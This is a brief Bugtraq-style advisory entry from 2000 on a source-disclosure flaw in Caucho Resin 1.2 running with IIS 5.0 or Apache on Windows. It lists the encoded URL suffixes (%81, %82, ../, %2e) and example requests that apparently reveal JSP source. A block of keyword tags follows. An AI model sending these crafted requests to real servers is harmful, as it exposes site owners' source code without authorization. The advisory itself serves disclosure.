bugtraq id 1986
class input validation error
cve generic-map-nomatch
remote yes
local yes
published november 23, 2000
updated november 23, 2000
vulnerable caucho technology resin 1.2
- microsoft iis 5.0
+ microsoft windows nt 2000
- apache group apache 1.3.6win32
apache (win32):
..
%2e..
%81
%82
example: http://target/filename.jsp%81
resin web server:
../
example: http://target/filename.jsp../
iis 5 requesting the url encoded with ascii:
'%2' instead of '.'
example: http://target/filename%2ejsp
Java Asp PHP .Net XML C/C++ CGI VB Jsp J2ee J2se J2me EJB Servlet Tomcat Resin Struts Weblogic Eclipse ANT GUI JMS Web servise IDEA Webphere Hibernate Spring Jboss Applet Swing Socket Javamail Perl Ajax P2P 安全 模式 框架 测试 开源 游戏
Windows XP Windows 2000 Windows 2003 Windows Me Windows 9.x Linux UNIX 注册表 操作系统 服务器 应用服务器